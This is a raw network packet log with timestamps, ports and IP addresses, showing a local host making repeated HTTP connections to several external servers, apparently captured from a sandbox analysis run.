Aug 27, 2024 17:47:07.386615992 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.386955976 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.552975893 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.553056002 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.553105116 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.553395033 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:08.714374065 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:09.732063055 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:09.911547899 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:09.911777973 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:09.920603991 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:09.920715094 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.100331068 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.100369930 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.100521088 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.100584984 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.100589037 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.100634098 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.100652933 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.100811958 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.101027966 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.280803919 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.280875921 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.280919075 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.280962944 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.281003952 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.281002998 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.281105042 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.281166077 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.281176090 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.281591892 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.281919003 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.281980991 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.282151937 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.282231092 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.282294989 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.282341957 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.460335970 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.460700989 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.460823059 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.461155891 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.461302042 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.461733103 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.488800049 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489088058 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489186049 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489202023 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489226103 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489407063 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.489407063 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.489428997 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489445925 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489486933 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489531040 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489545107 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.489743948 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.489743948 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:10.670622110 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.670696020 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.670754910 CEST	80	49814	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:10.671025991 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:11.432503939 CEST	49814	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.450336933 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.615694046 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.615869045 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.621155024 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.788662910 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797327042 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797436953 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797532082 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797597885 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797657013 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797712088 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797770977 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.797775030 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.797951937 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.797951937 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.798173904 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.798250914 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.798314095 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.798455000 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.798620939 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.963604927 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.963641882 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.963737965 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:12.963922977 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.963922977 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:12.967313051 CEST	49815	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:13.133177042 CEST	80	49815	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:18.355226994 CEST	49816	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:18.656327963 CEST	80	49816	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:18.656480074 CEST	49816	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:18.664393902 CEST	49816	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:18.965672970 CEST	80	49816	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:18.965771914 CEST	80	49816	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:18.965858936 CEST	80	49816	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:18.966069937 CEST	49816	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:20.180500984 CEST	49816	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:21.198102951 CEST	49817	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:21.520955086 CEST	80	49817	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:21.521145105 CEST	49817	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:21.529053926 CEST	49817	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:21.851955891 CEST	80	49817	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:21.852082968 CEST	80	49817	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:21.852209091 CEST	80	49817	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:21.852343082 CEST	49817	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:23.039336920 CEST	49817	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.057188034 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.360560894 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.360703945 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.369869947 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.369893074 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.369951963 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.671281099 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.671295881 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.671410084 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.671410084 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.671458006 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.671678066 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.671751022 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.672020912 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.672156096 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.672305107 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.672363043 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.673188925 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.673413038 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.673461914 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.973731041 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.973951101 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.974009991 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.974662066 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.974916935 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.974925995 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.974987030 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.975038052 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.975090027 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.975373030 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:24.975378036 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.975719929 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.975802898 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.976232052 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:24.976357937 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.276115894 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.276597977 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.276609898 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.277184010 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.277195930 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.277206898 CEST	80	49818	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:25.277384996 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:25.882335901 CEST	49818	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:26.899991989 CEST	49819	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:27.208131075 CEST	80	49819	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:27.208292007 CEST	49819	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:27.213629007 CEST	49819	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:27.521806002 CEST	80	49819	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:27.521915913 CEST	80	49819	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:27.521934986 CEST	80	49819	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:27.522167921 CEST	49819	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:27.524245024 CEST	49819	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:47:27.832226992 CEST	80	49819	38.47.207.120	192.168.11.20
Aug 27, 2024 17:47:41.173842907 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.394248009 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.394417048 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.402327061 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.622663021 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.623388052 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.623506069 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.623519897 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.623531103 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:41.623662949 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.623769999 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.623769999 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:41.843647003 CEST	80	49820	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:42.909841061 CEST	49820	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:43.927490950 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.160197020 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.160424948 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.168339968 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.401055098 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.401834965 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.401949883 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.401973009 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.401983976 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:44.402087927 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.402260065 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.402260065 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:44.634691954 CEST	80	49821	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:45.674835920 CEST	49821	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:46.692477942 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:46.914772987 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:46.914937973 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:46.923988104 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:46.924006939 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.146404028 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.146441936 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.146655083 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.147047043 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.147166014 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.147181034 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.147238016 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.147269964 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.147474051 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.188682079 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.188894033 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.372519970 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.372658014 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.372858047 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.411679983 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.411923885 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.412060976 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.595215082 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.595410109 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.636079073 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.636333942 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.636478901 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.818082094 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.818274021 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.858925104 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.859036922 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:47.859236956 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:47.859381914 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.044399023 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.044579029 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.092050076 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.092232943 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.092396021 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.266998053 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.267160892 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.314433098 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.314600945 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.314754009 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.439871073 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.489708900 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.489871979 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:48.537205935 CEST	80	49822	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:48.537345886 CEST	49822	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.457500935 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.682262897 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.682430029 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.687769890 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.912049055 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912497044 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912590981 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912606001 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912739992 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912754059 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912808895 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.912808895 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.912844896 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.912967920 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.912992954 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.913024902 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.913038969 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.913049936 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:49.913165092 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.913165092 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.913295031 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:49.915309906 CEST	49823	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:47:50.139821053 CEST	80	49823	194.58.112.174	192.168.11.20
Aug 27, 2024 17:47:55.701527119 CEST	49824	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:55.802985907 CEST	80	49824	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:55.803155899 CEST	49824	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:55.811145067 CEST	49824	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:55.912602901 CEST	80	49824	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:55.970052004 CEST	80	49824	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:55.970278978 CEST	80	49824	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:55.970423937 CEST	49824	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:57.312901020 CEST	49824	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:58.330477953 CEST	49825	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:58.432257891 CEST	80	49825	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:58.432465076 CEST	49825	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:58.440512896 CEST	49825	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:58.542062998 CEST	80	49825	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:58.613126993 CEST	80	49825	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:58.613205910 CEST	80	49825	35.244.245.121	192.168.11.20
Aug 27, 2024 17:47:58.613318920 CEST	49825	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:47:59.952903986 CEST	49825	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:00.970566988 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.072128057 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.072319031 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.081391096 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.081413984 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.081459999 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.183089018 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183104992 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183113098 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183120966 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183161974 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183171034 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183271885 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183325052 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.183394909 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.183408022 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183413029 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.183417082 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183553934 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.183602095 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.183917999 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.184115887 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.240520954 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285222054 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285233021 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285240889 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285289049 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285299063 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285306931 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285406113 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285413980 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285427094 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285449028 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.285471916 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.285520077 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.285537004 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285546064 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285553932 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285598993 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285684109 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.285690069 CEST	49826	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:48:01.286039114 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.286206961 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.286314011 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.286325932 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.286412001 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.286529064 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387046099 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387161970 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387223005 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387232065 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387285948 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387389898 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387501955 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387511969 CEST	80	49826	35.244.245.121	192.168.11.20
Aug 27, 2024 17:48:01.387556076 CEST	80	49826	35.244.245.121	192.168.11.20
